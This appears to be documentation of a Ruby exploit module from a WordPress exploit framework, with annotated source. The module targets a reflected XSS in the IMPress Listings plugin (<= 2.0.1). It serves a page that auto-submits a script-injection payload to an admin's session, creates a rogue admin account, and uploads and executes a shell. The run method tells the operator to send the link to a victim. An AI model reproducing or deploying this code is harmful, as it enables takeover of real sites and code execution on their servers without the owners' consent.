class Wpxf::Exploit::ImpressListingsReflectedXssShellUpload
Public Class Methods
new()
Calls superclass method
Wpxf::WordPress::Xss::new
# File lib/wpxf/modules/exploit/xss/reflected/impress_listings_reflected_xss_shell_upload.rb, line 7
# Registers the module metadata and the two options this module reads later:
# +initial_req_path+ (via #initial_req_path) and +listing_url+ (via #initial_script).
def initialize
  super

  description =
    'This module prepares a payload and link that can be sent to an '\
    'admin user which when visited with a valid session will create '\
    'a new admin user which will be used to upload and execute the '\
    'selected payload in the context of the web server.'

  update_info(
    name: 'IMPress Listings <= 2.0.1 Reflected XSS Shell Upload',
    desc: description,
    author: [
      'Kris <https://twitter.com/@CTFKris>', # Discovery and disclosure
      'rastating'                            # WPXF module
    ],
    references: [
      ['WPVDB', '8370'],
      ['URL', 'https://github.com/agentevolution/wp-listings/pull/52']
    ],
    date: 'Jan 27 2016'
  )

  # The default request path is a random token from Utility::Text.rand_alpha
  # (length drawn from 5..10), generated once when the module is instantiated.
  req_path_option = StringOption.new(
    name: 'initial_req_path',
    desc: 'The path to be used to identify the initial request',
    required: true,
    default: Utility::Text.rand_alpha(rand(5..10))
  )
  listing_option = StringOption.new(
    name: 'listing_url',
    desc: 'The URL of a valid listing generated by the plugin',
    required: true
  )
  register_options([req_path_option, listing_option])
end
Public Instance Methods
check()
# File lib/wpxf/modules/exploit/xss/reflected/impress_listings_reflected_xss_shell_upload.rb, line 42
# Vulnerability check: delegates to the framework's readme-based version
# comparison for the wp-listings plugin. The 2.0.2 boundary is consistent
# with the "<= 2.0.1" range given in the module name.
def check
  plugin_slug = 'wp-listings'
  fixed_version = '2.0.2'
  check_plugin_version_from_readme(plugin_slug, fixed_version)
end
initial_req_path()
# File lib/wpxf/modules/exploit/xss/reflected/impress_listings_reflected_xss_shell_upload.rb, line 46
# Returns the normalized value of the +initial_req_path+ option registered
# in #initialize; used by #initial_url and #on_http_request.
def initial_req_path
  option_name = 'initial_req_path'
  normalized_option_value(option_name)
end
initial_script()
# File lib/wpxf/modules/exploit/xss/reflected/impress_listings_reflected_xss_shell_upload.rb, line 54
# Builds the HTML page served for the initial request (see #on_http_request).
# It embeds the framework's +js_post+ helper and submits a form POST to the
# configured +listing_url+ whose +contactName+ field carries the reflected
# payload built from +xss_ascii_encoded_include_script+.
# NOTE(review): the line breaks inside this %Q literal were reconstructed from
# a collapsed rendering of the file; confirm them against the original source.
def initial_script
  %Q|<html><head></head><body>
    <script>
      #{js_post}
      post('#{datastore['listing_url']}', {
        contactName: '"><script>#{xss_ascii_encoded_include_script}<\\/script><"'
      });
    </script>
  </body></html>
  |
end
initial_url()
# File lib/wpxf/modules/exploit/xss/reflected/impress_listings_reflected_xss_shell_upload.rb, line 50
# The full URL of the initial request: the framework's +xss_url+ joined with
# the random +initial_req_path+ token. Printed by #run.
def initial_url
  base = xss_url
  normalize_uri(base, initial_req_path)
end
on_http_request(path, params, headers)
Calls superclass method
Wpxf::WordPress::Xss#on_http_request
# File lib/wpxf/modules/exploit/xss/reflected/impress_listings_reflected_xss_shell_upload.rb, line 66
# HTTP server callback. A request whose path exactly equals
# +xss_path+/+initial_req_path+ is answered with the page from #initial_script;
# every other request is handed to the superclass handler unchanged.
# +params+ and +headers+ are not read here but are forwarded by the bare +super+.
def on_http_request(path, params, headers)
  expected_path = normalize_uri(xss_path, initial_req_path)
  return super unless path.eql?(expected_path)

  emit_info 'Initial request received...'
  { type: 'text/html', body: initial_script }
end
run()
Calls superclass method
Wpxf::Module#run
# File lib/wpxf/modules/exploit/xss/reflected/impress_listings_reflected_xss_shell_upload.rb, line 75
# Module entry point. Returns false if the superclass +run+ fails; otherwise
# prints #initial_url surrounded by blank lines, starts the HTTP server and
# returns @success. @success is reset to false here and is presumably set to
# true elsewhere (outside this block) once the flow completes — not visible here.
def run
  return false unless super

  @success = false
  emit_info 'Provide the URL below to the victim to begin the payload upload'
  puts '', initial_url, ''
  start_http_server
  @success
end